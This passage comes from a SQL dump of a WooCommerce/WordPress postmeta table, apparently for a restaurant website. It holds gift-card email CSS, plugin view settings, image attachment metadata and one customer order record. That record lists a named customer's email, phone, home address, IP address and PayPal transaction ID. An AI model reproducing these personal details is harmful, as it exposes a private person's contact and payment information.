Fee','4.60'),(5768,387,'_order_key','wc_order_58f1e3855580a'),(5769,387,'_order_currency','EUR'),(5770,387,'_prices_include_tax','no'),(5771,387,'_customer_ip_address','62.220.90.252'),(5772,387,'_customer_user_agent','Mozilla/5.0 (iPhone; CPU iPhone OS 10_3_1 like Mac OS X) AppleWebKit/603.1.30 (KHTML, like Gecko) Version/10.0 Mobile/14E304 Safari/602.1'),(5773,387,'_customer_user','13'),(5774,387,'_created_via','checkout'),(5775,387,'_cart_hash','61b63e3ee2cbd00f92eb09eb8dbbb36e'),(5776,387,'_order_version','2.6.14'),(5777,387,'_billing_first_name','Benedetta'),(5778,387,'_billing_last_name','Maccalli'),(5779,387,'_billing_email','Benedetta.maccalli@gmail.com'),(5780,387,'_billing_phone','3346752376'),(5781,387,'_billing_address_1','Via opifici 50'),(5782,387,'_billing_city','Gandino'),(5783,387,'_shipping_first_name','Benedetta'),(5784,387,'_shipping_last_name','Maccalli'),(5785,387,'_shipping_company',''),(5786,387,'_shipping_country',''),(5787,387,'_shipping_address_1','Via opifici 50'),(5788,387,'_shipping_address_2',''),(5789,387,'_shipping_city','Gandino'),(5790,387,'_shipping_state',''),(5791,387,'_shipping_postcode',''),(5792,387,'_payment_method','paypal'),(5793,387,'_payment_method_title','PayPal'),(5794,387,'_order_shipping',''),(5795,387,'_cart_discount','0'),(5796,387,'_cart_discount_tax','0'),(5797,387,'_order_tax','0'),(5798,387,'_order_shipping_tax','0'),(5799,387,'_order_total','175.00'),(5800,387,'Numero Persone Adulte','7'),(5801,387,'Numero bambini fino a 6 anni',''),(5802,387,'Numero ragazzi fino a 13 anni',''),(5803,387,'Files attached','[]'),(5804,387,'Payer PayPal address','Benedetta.maccalli@gmail.com'),(5805,387,'Payer first name','benedetta'),(5806,387,'Payer last name','maccalli'),(5807,387,'Payment type','instant'),(5808,387,'_download_permissions_granted','1'),(5809,387,'_recorded_sales','yes'),(5810,387,'_paid_date','2017-04-15 11:13:14'),(5811,387,'_transaction_id','5VS04959HH5032525'),(5812,387,'_order_stock_reduced','1'),(5813,387,'PayPal Transaction Fee','6.30'),(5817,391,'_pt_cv_id','3da746594v'),(5818,391,'_pt_cv_settings','a:39:{s:16:\"pt_cv_form_nonce\";s:10:\"dba8b5f77b\";s:16:\"_wp_http_referer\";s:56:\"/wp-admin/admin.php?page=content-views-add&id=3da746594v\";s:13:\"pt-cv-post-id\";s:3:\"391\";s:13:\"pt-cv-view-id\";s:10:\"3da746594v\";s:13:\"pt-cv-version\";s:12:\"free-1.9.9.1\";s:16:\"pt-cv-view-title\";s:4:\"home\";s:18:\"pt-cv-content-type\";s:4:\"page\";s:14:\"pt-cv-post__in\";s:13:\"141,10,207,28\";s:18:\"pt-cv-post__not_in\";s:0:\"\";s:17:\"pt-cv-post_parent\";s:0:\"\";s:11:\"pt-cv-limit\";s:2:\"10\";s:23:\"pt-cv-category-operator\";s:2:\"IN\";s:23:\"pt-cv-post_tag-operator\";s:2:\"IN\";s:23:\"pt-cv-taxonomy-relation\";s:3:\"AND\";s:13:\"pt-cv-orderby\";s:0:\"\";s:11:\"pt-cv-order\";s:3:\"asc\";s:17:\"pt-cv-post_status\";a:1:{i:0;s:7:\"publish\";}s:7:\"pt-cv-s\";s:0:\"\";s:15:\"pt-cv-view-type\";s:4:\"grid\";s:25:\"pt-cv-grid-number-columns\";s:1:\"2\";s:33:\"pt-cv-collapsible-open-first-item\";s:3:\"yes\";s:32:\"pt-cv-resp-tablet-number-columns\";s:1:\"2\";s:25:\"pt-cv-resp-number-columns\";s:1:\"1\";s:19:\"pt-cv-layout-format\";s:5:\"1-col\";s:30:\"pt-cv-field-thumbnail-position\";s:4:\"left\";s:26:\"pt-cv-show-field-thumbnail\";s:3:\"yes\";s:22:\"pt-cv-show-field-title\";s:3:\"yes\";s:24:\"pt-cv-show-field-content\";s:3:\"yes\";s:21:\"pt-cv-field-title-tag\";s:2:\"h3\";s:26:\"pt-cv-field-thumbnail-size\";s:9:\"thumbnail\";s:24:\"pt-cv-field-content-show\";s:7:\"excerpt\";s:26:\"pt-cv-field-excerpt-length\";s:2:\"50\";s:33:\"pt-cv-field-excerpt-readmore-text\";s:8:\"Scopri..\";s:22:\"pt-cv-meta-fields-date\";s:3:\"yes\";s:26:\"pt-cv-meta-fields-taxonomy\";s:3:\"yes\";s:31:\"pt-cv-pagination-items-per-page\";s:1:\"5\";s:21:\"pt-cv-pagination-type\";s:4:\"ajax\";s:22:\"pt-cv-pagination-style\";s:7:\"regular\";s:19:\"pt-cv-other-open-in\";s:5:\"_self\";}'),(5820,141,'_thumbnail_id','199'),(5821,10,'_thumbnail_id','136'),(5822,10,'_yoast_wpseo_content_score','60'),(5823,207,'_edit_lock','1499377378:1'),(5824,207,'_edit_last','1'),(5825,207,'_thumbnail_id','212'),(5826,207,'_yoast_wpseo_content_score','30'),(5827,28,'_thumbnail_id','198'),(5828,28,'_yoast_wpseo_content_score','60'),(5852,403,'_wp_attached_file','2017/07/giftimg.png'),(5853,403,'_wp_attachment_metadata','a:5:{s:5:\"width\";i:351;s:6:\"height\";i:131;s:4:\"file\";s:19:\"2017/07/giftimg.png\";s:5:\"sizes\";a:9:{s:21:\"woocommerce_thumbnail\";a:5:{s:4:\"file\";s:19:\"giftimg-300x131.png\";s:5:\"width\";i:300;s:6:\"height\";i:131;s:9:\"mime-type\";s:9:\"image/png\";s:9:\"uncropped\";b:0;}s:29:\"woocommerce_gallery_thumbnail\";a:4:{s:4:\"file\";s:19:\"giftimg-100x100.png\";s:5:\"width\";i:100;s:6:\"height\";i:100;s:9:\"mime-type\";s:9:\"image/png\";}s:18:\"woocommerce_single\";a:4:{s:4:\"file\";s:19:\"giftimg-300x112.png\";s:5:\"width\";i:300;s:6:\"height\";i:112;s:9:\"mime-type\";s:9:\"image/png\";}s:9:\"thumbnail\";a:4:{s:4:\"file\";s:19:\"giftimg-150x131.png\";s:5:\"width\";i:150;s:6:\"height\";i:131;s:9:\"mime-type\";s:9:\"image/png\";}s:6:\"medium\";a:4:{s:4:\"file\";s:19:\"giftimg-300x112.png\";s:5:\"width\";i:300;s:6:\"height\";i:112;s:9:\"mime-type\";s:9:\"image/png\";}s:14:\"shop_thumbnail\";a:4:{s:4:\"file\";s:19:\"giftimg-100x100.png\";s:5:\"width\";i:100;s:6:\"height\";i:100;s:9:\"mime-type\";s:9:\"image/png\";}s:12:\"shop_catalog\";a:5:{s:4:\"file\";s:19:\"giftimg-300x131.png\";s:5:\"width\";i:300;s:6:\"height\";i:131;s:9:\"mime-type\";s:9:\"image/png\";s:9:\"uncropped\";b:0;}s:18:\"sydney-small-thumb\";a:4:{s:4:\"file\";s:18:\"giftimg-230x86.png\";s:5:\"width\";i:230;s:6:\"height\";i:86;s:9:\"mime-type\";s:9:\"image/png\";}s:20:\"sydney-service-thumb\";a:4:{s:4:\"file\";s:19:\"giftimg-350x131.png\";s:5:\"width\";i:350;s:6:\"height\";i:131;s:9:\"mime-type\";s:9:\"image/png\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),(5854,404,'_wp_attached_file','2017/07/giftimg2.png'),(5855,404,'_wp_attachment_metadata','a:5:{s:5:\"width\";i:283;s:6:\"height\";i:241;s:4:\"file\";s:20:\"2017/07/giftimg2.png\";s:5:\"sizes\";a:5:{s:29:\"woocommerce_gallery_thumbnail\";a:4:{s:4:\"file\";s:20:\"giftimg2-100x100.png\";s:5:\"width\";i:100;s:6:\"height\";i:100;s:9:\"mime-type\";s:9:\"image/png\";}s:21:\"woocommerce_thumbnail\";a:5:{s:4:\"file\";s:20:\"giftimg2-200x241.png\";s:5:\"width\";i:200;s:6:\"height\";i:241;s:9:\"mime-type\";s:9:\"image/png\";s:9:\"uncropped\";b:1;}s:9:\"thumbnail\";a:4:{s:4:\"file\";s:20:\"giftimg2-150x150.png\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:9:\"image/png\";}s:14:\"shop_thumbnail\";a:4:{s:4:\"file\";s:20:\"giftimg2-100x100.png\";s:5:\"width\";i:100;s:6:\"height\";i:100;s:9:\"mime-type\";s:9:\"image/png\";}s:18:\"sydney-small-thumb\";a:4:{s:4:\"file\";s:20:\"giftimg2-230x196.png\";s:5:\"width\";i:230;s:6:\"height\";i:196;s:9:\"mime-type\";s:9:\"image/png\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),(5856,405,'mwb_css_field','html,body{margin: 0 auto !important;padding: 0 !important;height: 100% !important;width: 100% !important;}/* What it does: Stops email clients resizing small text. */*{-ms-text-size-adjust: 100%;-webkit-text-size-adjust: 100%;}/* What is does: Centers email on Android 4.4 */div[style*=\'margin: 16px 0\']{margin:0 !important;}/* What it does: Stops Outlook from adding extra spacing to tables. */table,td{mso-table-lspace: 0pt !important;mso-table-rspace: 0pt !important;}/* What it does: Fixes webkit padding issue. Fix for Yahoo mail table alignment bug. Applies table-layout to the first 2 tables then removes for anything nested deeper. */table{border-spacing: 0 !important;border-collapse: collapse !important;table-layout: fixed !important;margin: 0 auto !important;}table table table{table-layout: auto;}/* What it does: Uses a better rendering method when resizing images in IE. */img{-ms-interpolation-mode:bicubic;}/* What it does: A work-around for iOS meddling in triggered links. */.mobile-link--footer a,a[x-apple-data-detectors]{color:inherit !important;text-decoration: underline !important;}/* What it does: Prevents underlining the button text in Windows 10 */.button-link{text-decoration: none !important;}.mwb_coupon_section{text-align: center;background-position: center center !important;background-size: cover !important; padding-top: 27px;padding-bottom:27px;}@media screen and (max-width: 600px){.email-container{width: 100% !important;margin: auto !important;}/* What it does: Forces elements to resize to the full width of their container. Useful for resizing images beyond their max-width. */.fluid{max-width: 100% !important;height: auto !important;margin-left: auto !important;margin-right: auto !important;}/* What it does: Generic utility class for centering. Useful for images, buttons, and nested tables. */.center-on-narrow{display: block !important;margin-left: auto !important;margin-right: auto !important;float: none !important;}table.center-on-narrow{display: inline-block !important;}}@media screen and (max-width: 480px){/* What it does: Forces table cells into full-width rows. */.stack-column,.stack-column-center{display: block !important;width: 100% !important;max-width: 100% !important;direction: ltr !important;}/* And center justify these ones. */.stack-column-center{text-align: center !important;}}.img-block > img{max-width: 300px; width: 100%;}'),(5857,405,'_thumbnail_id','403'),(5858,406,'mwb_css_field','html,body{margin: 0 auto !important;padding: 0 !important;height: 100% !important;width: 100% !important;}/* What it does: Stops email clients resizing small text. */*{-ms-text-size-adjust: 100%;-webkit-text-size-adjust: 100%;}/* What is does: Centers email on Android 4.4 */div[style*=\'margin: 16px 0\']{margin:0 !important;}/* What it does: Stops Outlook from adding extra spacing to tables. */table,td{mso-table-lspace: 0pt !important;mso-table-rspace: 0pt !important;}/* What it does: Fixes webkit padding issue. Fix for Yahoo mail table alignment bug. Applies table-layout to the first 2 tables then removes for anything nested deeper. */table{border-spacing: 0 !important;border-collapse: collapse !important;table-layout: fixed !important;margin: 0 auto !important;}table table table{table-layout: auto;}/* What it does: Uses a better rendering method when resizing images in IE. */img{-ms-interpolation-mode:bicubic;}/* What it does: A work-around for iOS meddling in triggered links. */.mobile-link--footer a,a[x-apple-data-detectors]{color:inherit !important;text-decoration: underline !important;}/* What it does: Prevents underlining the button text in Windows 10 */.button-link{text-decoration: none !important;}.mwb_coupon_section{text-align: center;background-position: center center !important;background-size: cover !important; padding-top: 27px;padding-bottom:27px; padding: 15px 0px; background-image: url(\'http://www.ristorantesolymar.it/wp-content/plugins/woocommerce-ultimate-gift-card/assets/images/coupen-code.png\'); background-position: center center; background-size: cover;}@media screen and (max-width: 600px){.email-container{width: 100% !important;margin: auto !important;}/* What it does: Forces elements to resize to the full width of their container. Useful for resizing images beyond their max-width. */.fluid{max-width: 100% !important;height: auto !important;margin-left: auto !important;margin-right: auto !important;}/* What it does: Generic utility class for centering. Useful for images, buttons, and nested tables. */.center-on-narrow{text-align: center !important;display: block !important;margin-left: auto !important;margin-right: auto !important;float: none !important;}table.center-on-narrow{display: inline-block !important;}}@media screen and (max-width: 480px){/* What it does: Forces table cells into full-width rows. */.stack-column,.stack-column-center{display: block !important;width: 100% !important;max-width: 100% !important;direction: ltr !important;}/* And center justify these ones. */.stack-column-center{text-align: center !important;}}'),(5859,406,'_thumbnail_id','404'),(5863,407,'_wp_attached_file','2017/07/sol-y-mar-logo-150.png'),(5864,407,'_wp_attachment_metadata','a:5:{s:5:\"width\";i:237;s:6:\"height\";i:150;s:4:\"file\";s:30:\"2017/07/sol-y-mar-logo-150.png\";s:5:\"sizes\";a:5:{s:29:\"woocommerce_gallery_thumbnail\";a:4:{s:4:\"file\";s:30:\"sol-y-mar-logo-150-100x100.png\";s:5:\"width\";i:100;s:6:\"height\";i:100;s:9:\"mime-type\";s:9:\"image/png\";}s:21:\"woocommerce_thumbnail\";a:5:{s:4:\"file\";s:30:\"sol-y-mar-logo-150-200x150.png\";s:5:\"width\";i:200;s:6:\"height\";i:150;s:9:\"mime-type\";s:9:\"image/png\";s:9:\"uncropped\";b:1;}s:9:\"thumbnail\";a:4:{s:4:\"file\";s:30:\"sol-y-mar-logo-150-150x150.png\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:9:\"image/png\";}s:14:\"shop_thumbnail\";a:4:{s:4:\"file\";s:30:\"sol-y-mar-logo-150-100x100.png\";s:5:\"width\";i:100;s:6:\"height\";i:100;s:9:\"mime-type\";s:9:\"image/png\";}s:18:\"sydney-small-thumb\";a:4:{s:4:\"file\";s:30:\"sol-y-mar-logo-150-230x146.png\";s:5:\"width\";i:230;s:6:\"height\";i:146;s:9:\"mime-type\";s:9:\"image/png\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),(5865,399,'_edit_lock','1499717082:1'),(5866,408,'_wp_attached_file','2017/07/anniversary.png'),(5867,408,'_wp_attachment_metadata','a:5:{s:5:\"width\";i:399;s:6:\"height\";i:300;s:4:\"file\";s:23:\"2017/07/anniversary.png\";s:5:\"sizes\";a:9:{s:21:\"woocommerce_thumbnail\";a:5:{s:4:\"file\";s:23:\"anniversary-300x300.png\";s:5:\"width\";i:300;s:6:\"height\";i:300;s:9:\"mime-type\";s:9:\"image/png\";s:9:\"uncropped\";b:0;}s:29:\"woocommerce_gallery_thumbnail\";a:4:{s:4:\"file\";s:23:\"anniversary-100x100.png\";s:5:\"width\";i:100;s:6:\"height\";i:100;s:9:\"mime-type\";s:9:\"image/png\";}s:18:\"woocommerce_single\";a:4:{s:4:\"file\";s:23:\"anniversary-300x226.png\";s:5:\"width\";i:300;s:6:\"height\";i:226;s:9:\"mime-type\";s:9:\"image/png\";}s:9:\"thumbnail\";a:4:{s:4:\"file\";s:23:\"anniversary-150x150.png\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:9:\"image/png\";}s:6:\"medium\";a:4:{s:4:\"file\";s:23:\"anniversary-300x226.png\";s:5:\"width\";i:300;s:6:\"height\";i:226;s:9:\"mime-type\";s:9:\"image/png\";}s:14:\"shop_thumbnail\";a:4:{s:4:\"file\";s:23:\"anniversary-100x100.png\";s:5:\"width\";i:100;s:6:\"height\";i:100;s:9:\"mime-type\";s:9:\"image/png\";}s:12:\"shop_catalog\";a:5:{s:4:\"file\";s:23:\"anniversary-300x300.png\";s:5:\"width\";i:300;s:6:\"height\";i:300;s:9:\"mime-type\";s:9:\"image/png\";s:9:\"uncropped\";b:0;}s:18:\"sydney-small-thumb\";a:4:{s:4:\"file\";s:23:\"anniversary-230x173.png\";s:5:\"width\";i:230;s:6:\"height\";i:173;s:9:\"mime-type\";s:9:\"image/png\";}s:20:\"sydney-service-thumb\";a:4:{s:4:\"file\";s:23:\"anniversary-350x263.png\";s:5:\"width\";i:350;s:6:\"height\";i:263;s:9:\"mime-type\";s:9:\"image/png\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),(5868,409,'_wp_attached_file','2017/07/birthday.png'),(5869,409,'_wp_attachment_metadata','a:5:{s:5:\"width\";i:488;s:6:\"height\";i:315;s:4:\"file\";s:20:\"2017/07/birthday.png\";s:5:\"sizes\";a:10:{s:21:\"woocommerce_thumbnail\";a:5:{s:4:\"file\";s:20:\"birthday-300x315.png\";s:5:\"width\";i:300;s:6:\"height\";i:315;s:9:\"mime-type\";s:9:\"image/png\";s:9:\"uncropped\";b:0;}s:29:\"woocommerce_gallery_thumbnail\";a:4:{s:4:\"file\";s:20:\"birthday-100x100.png\";s:5:\"width\";i:100;s:6:\"height\";i:100;s:9:\"mime-type\";s:9:\"image/png\";}s:18:\"woocommerce_single\";a:4:{s:4:\"file\";s:20:\"birthday-300x194.png\";s:5:\"width\";i:300;s:6:\"height\";i:194;s:9:\"mime-type\";s:9:\"image/png\";}s:9:\"thumbnail\";a:4:{s:4:\"file\";s:20:\"birthday-150x150.png\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:9:\"image/png\";}s:6:\"medium\";a:4:{s:4:\"file\";s:20:\"birthday-300x194.png\";s:5:\"width\";i:300;s:6:\"height\";i:194;s:9:\"mime-type\";s:9:\"image/png\";}s:14:\"shop_thumbnail\";a:4:{s:4:\"file\";s:20:\"birthday-100x100.png\";s:5:\"width\";i:100;s:6:\"height\";i:100;s:9:\"mime-type\";s:9:\"image/png\";}s:12:\"shop_catalog\";a:5:{s:4:\"file\";s:20:\"birthday-300x315.png\";s:5:\"width\";i:300;s:6:\"height\";i:315;s:9:\"mime-type\";s:9:\"image/png\";s:9:\"uncropped\";b:0;}s:18:\"sydney-small-thumb\";a:4:{s:4:\"file\";s:20:\"birthday-230x148.png\";s:5:\"width\";i:230;s:6:\"height\";i:148;s:9:\"mime-type\";s:9:\"image/png\";}s:20:\"sydney-service-thumb\";a:4:{s:4:\"file\";s:20:\"birthday-350x226.png\";s:5:\"width\";i:350;s:6:\"height\";i:226;s:9:\"mime-type\";s:9:\"image/png\";}s:16:\"sydney-mas-thumb\";a:4:{s:4:\"file\";s:20:\"birthday-480x310.png\";s:5:\"width\";i:480;s:6:\"height\";i:310;s:9:\"mime-type\";s:9:\"image/png\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),(5870,410,'_wp_attached_file','2017/07/newyear.png'),(5871,410,'_wp_attachment_metadata','a:5:{s:5:\"width\";i:441;s:6:\"height\";i:327;s:4:\"file\";s:19:\"2017/07/newyear.png\";s:5:\"sizes\";a:9:{s:21:\"woocommerce_thumbnail\";a:5:{s:4:\"file\";s:19:\"newyear-300x327.png\";s:5:\"width\";i:300;s:6:\"height\";i:327;s:9:\"mime-type\";s:9:\"image/png\";s:9:\"uncropped\";b:0;}s:29:\"woocommerce_gallery_thumbnail\";a:4:{s:4:\"file\";s:19:\"newyear-100x100.png\";s:5:\"width\";i:100;s:6:\"height\";i:100;s:9:\"mime-type\";s:9:\"image/png\";}s:18:\"woocommerce_single\";a:4:{s:4:\"file\";s:19:\"newyear-300x222.png\";s:5:\"width\";i:300;s:6:\"height\";i:222;s:9:\"mime-type\";s:9:\"image/png\";}s:9:\"thumbnail\";a:4:{s:4:\"file\";s:19:\"newyear-150x150.png\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:9:\"image/png\";}s:6:\"medium\";a:4:{s:4:\"file\";s:19:\"newyear-300x222.png\";s:5:\"width\";i:300;s:6:\"height\";i:222;s:9:\"mime-type\";s:9:\"image/png\";}s:14:\"shop_thumbnail\";a:4:{s:4:\"file\";s:19:\"newyear-100x100.png\";s:5:\"width\";i:100;s:6:\"height\";i:100;s:9:\"mime-type\";s:9:\"image/png\";}s:12:\"shop_catalog\";a:5:{s:4:\"file\";s:19:\"newyear-300x327.png\";s:5:\"width\";i:300;s:6:\"height\";i:327;s:9:\"mime-type\";s:9:\"image/png\";s:9:\"uncropped\";b:0;}s:18:\"sydney-small-thumb\";a:4:{s:4:\"file\";s:19:\"newyear-230x171.png\";s:5:\"width\";i:230;s:6:\"height\";i:171;s:9:\"mime-type\";s:9:\"image/png\";}s:20:\"sydney-service-thumb\";a:4:{s:4:\"file\";s:19:\"newyear-350x260.png\";s:5:\"width\";i:350;s:6:\"height\";i:260;s:9:\"mime-type\";s:9:\"image/png\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),(5872,411,'_wp_attached_file','2017/07/eid.png'),(5873,411,'_wp_attachment_metadata','a:5:{s:5:\"width\";i:603;s:6:\"height\";i:360;s:4:\"file\";s:15:\"2017/07/eid.png\";s:5:\"sizes\";a:12:{s:21:\"woocommerce_thumbnail\";a:5:{s:4:\"file\";s:15:\"eid-300x360.png\";s:5:\"width\";i:300;s:6:\"height\";i:360;s:9:\"mime-type\";s:9:\"image/png\";s:9:\"uncropped\";b:0;}s:29:\"woocommerce_gallery_thumbnail\";a:4:{s:4:\"file\";s:15:\"eid-100x100.png\";s:5:\"width\";i:100;s:6:\"height\";i:100;s:9:\"mime-type\";s:9:\"image/png\";}s:18:\"woocommerce_single\";a:4:{s:4:\"file\";s:15:\"eid-600x358.png\";s:5:\"width\";i:600;s:6:\"height\";i:358;s:9:\"mime-type\";s:9:\"image/png\";}s:9:\"thumbnail\";a:4:{s:4:\"file\";s:15:\"eid-150x150.png\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:9:\"image/png\";}s:6:\"medium\";a:4:{s:4:\"file\";s:15:\"eid-300x179.png\";s:5:\"width\";i:300;s:6:\"height\";i:179;s:9:\"mime-type\";s:9:\"image/png\";}s:14:\"shop_thumbnail\";a:4:{s:4:\"file\";s:15:\"eid-100x100.png\";s:5:\"width\";i:100;s:6:\"height\";i:100;s:9:\"mime-type\";s:9:\"image/png\";}s:12:\"shop_catalog\";a:5:{s:4:\"file\";s:15:\"eid-300x360.png\";s:5:\"width\";i:300;s:6:\"height\";i:360;s:9:\"mime-type\";s:9:\"image/png\";s:9:\"uncropped\";b:0;}s:11:\"shop_single\";a:4:{s:4:\"file\";s:15:\"eid-600x358.png\";s:5:\"width\";i:600;s:6:\"height\";i:358;s:9:\"mime-type\";s:9:\"image/png\";}s:19:\"sydney-medium-thumb\";a:4:{s:4:\"file\";s:15:\"eid-550x360.png\";s:5:\"width\";i:550;s:6:\"height\";i:360;s:9:\"mime-type\";s:9:\"image/png\";}s:18:\"sydney-small-thumb\";a:4:{s:4:\"file\";s:15:\"eid-230x137.png\";s:5:\"width\";i:230;s:6:\"height\";i:137;s:9:\"mime-type\";s:9:\"image/png\";}s:20:\"sydney-service-thumb\";a:4:{s:4:\"file\";s:15:\"eid-350x209.png\";s:5:\"width\";i:350;s:6:\"height\";i:209;s:9:\"mime-type\";s:9:\"image/png\";}s:16:\"sydney-mas-thumb\";a:4:{s:4:\"file\";s:15:\"eid-480x287.png\";s:5:\"width\";i:480;s:6:\"height\";i:287;s:9:\"mime-type\";s:9:\"image/png\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),(5874,412,'mwb_css_field','html, body{margin: 0 auto !important; padding: 0 !important; height: 100% !important; width: 100% !important;}/* What it does: Stops email clients resizing small text. */ *{-ms-text-size-adjust: 100%; -webkit-text-size-adjust: 100%;}/* What is does: Centers email on Android 4.4 */ div[style*=\"margin: 16px 0\"]{margin:0 !important;}/* What it does: Stops Outlook from adding extra spacing to tables. */ table, td{mso-table-lspace: 0pt !important; mso-table-rspace: 0pt !important;}/* What it does: Fixes webkit padding issue. Fix for Yahoo mail table alignment bug. Applies table-layout to the first 2 tables then removes for anything nested deeper. */ table{border-spacing: 0 !important; border-collapse: collapse !important; table-layout: fixed !important; margin: 0 auto !important;}table table table{table-layout: auto;}/* What it does: Uses a better rendering method when resizing images in IE. */ img{-ms-interpolation-mode:bicubic;}/* What it does: A work-around for iOS meddling in triggered links. */ .mobile-link--footer a, a[x-apple-data-detectors]{color:inherit !important; text-decoration: underline !important;}/* What it does: Prevents underlining the button text in Windows 10 */ .button-link{text-decoration: none !important;}.button-td, .button-a{transition: all 100ms ease-in;}.button-td:hover, .button-a:hover{background: #555555 !important; border-color: #555555 !important;}.feature_img > img{display: block; margin: 0 auto; max-width: 400px; width: 100%;}'),(5875,412,'_thumbnail_id','408'),(5876,413,'mwb_css_field','html, body{margin: 0 auto !important; padding: 0 !important; height: 100% !important; width: 100% !important;}/* What it does: Stops email clients resizing small text. */ *{-ms-text-size-adjust: 100%; -webkit-text-size-adjust: 100%;}/* What is does: Centers email on Android 4.4 */ div[style*=\"margin: 16px 0\"]{margin:0 !important;}/* What it does: Stops Outlook from adding extra spacing to tables. */ table, td{mso-table-lspace: 0pt !important; mso-table-rspace: 0pt !important;}/* What it does: Fixes webkit padding issue. Fix for Yahoo mail table alignment bug. Applies table-layout to the first 2 tables then removes for anything nested deeper. */ table{border-spacing: 0 !important; border-collapse: collapse !important; table-layout: fixed !important; margin: 0 auto !important;}table table table{table-layout: auto;}/* What it does: Uses a better rendering method when resizing images in IE. */ img{-ms-interpolation-mode:bicubic;}/* What it does: A work-around for iOS meddling in triggered links. */ .mobile-link--footer a, a[x-apple-data-detectors]{color:inherit !important; text-decoration: underline !important;}/* What it does: Prevents underlining the button text in Windows 10 */ .button-link{text-decoration: none !important;}.button-td, .button-a{transition: all 100ms ease-in;}.button-td:hover, .button-a:hover{background: #555555 !important; border-color: #555555 !important;}.feature_img > img{display: block; margin: 0 auto; max-width: 400px; width: 100%;}'),(5877,413,'_thumbnail_id','409'),(5878,414,'mwb_css_field','html, body{margin: 0 auto !important; padding: 0 !important; height: 100% !important; width: 100% !important;}/* What it does: Stops email clients resizing small text. */ *{-ms-text-size-adjust: 100%; -webkit-text-size-adjust: 100%;}/* What is does: Centers email on Android 4.4 */ div[style*=\"margin: 16px 0\"]{margin:0 !important;}/* What it does: Stops Outlook from adding extra spacing to tables. */ table, td{mso-table-lspace: 0pt !important; mso-table-rspace: 0pt !important;}/* What it does: Fixes webkit padding issue. Fix for Yahoo mail table alignment bug. Applies table-layout to the first 2 tables then removes for anything nested deeper. */ table{border-spacing: 0 !important; border-collapse: collapse !important; table-layout: fixed !important; margin: 0 auto !important;}table table table{table-layout: auto;}/* What it does: Uses a better rendering method when resizing images in IE. */ img{-ms-interpolation-mode:bicubic;}/* What it does: A work-around for iOS meddling in triggered links. */ .mobile-link--footer a, a[x-apple-data-detectors]{color:inherit !important; text-decoration: underline !important;}/* What it does: Prevents underlining the button text in Windows 10 */ .button-link{text-decoration: none !important;}.button-td, .button-a{transition: all 100ms ease-in;}.button-td:hover, .button-a:hover{background: #555555 !important; border-color: #555555 !important;}.feature_img > img{display: block; margin: 0 auto; max-width: 400px; width: 100%;}'),(5879,414,'_thumbnail_id','410'),(5880,415,'mwb_css_field','html, body{margin: 0 auto !important; 